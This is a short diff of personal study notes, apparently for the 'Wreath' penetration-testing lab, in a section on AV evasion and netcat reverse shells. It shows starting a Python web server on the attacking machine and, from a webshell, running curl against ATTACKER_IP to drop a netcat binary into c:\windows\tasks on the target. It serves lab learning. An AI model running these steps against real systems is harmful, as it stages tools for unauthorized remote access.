kairosart/Wreath/AV EVASION/Compiling Netcat & Reverse Shell!.md

 ## cURL

+#Attacking_Machine
+Open a python server.

+`sudo python3 -m http.server 80`

+#Webshell
-From #Webshell  use cURL to upload your new copy of netcat to the target:
+Use cURL to upload your new copy of netcat to the target:

 `curl http://ATTACKER_IP/nc.exe/nc64.exe -o c:\\windows\\tasks\\nc-USERNAME.exe   `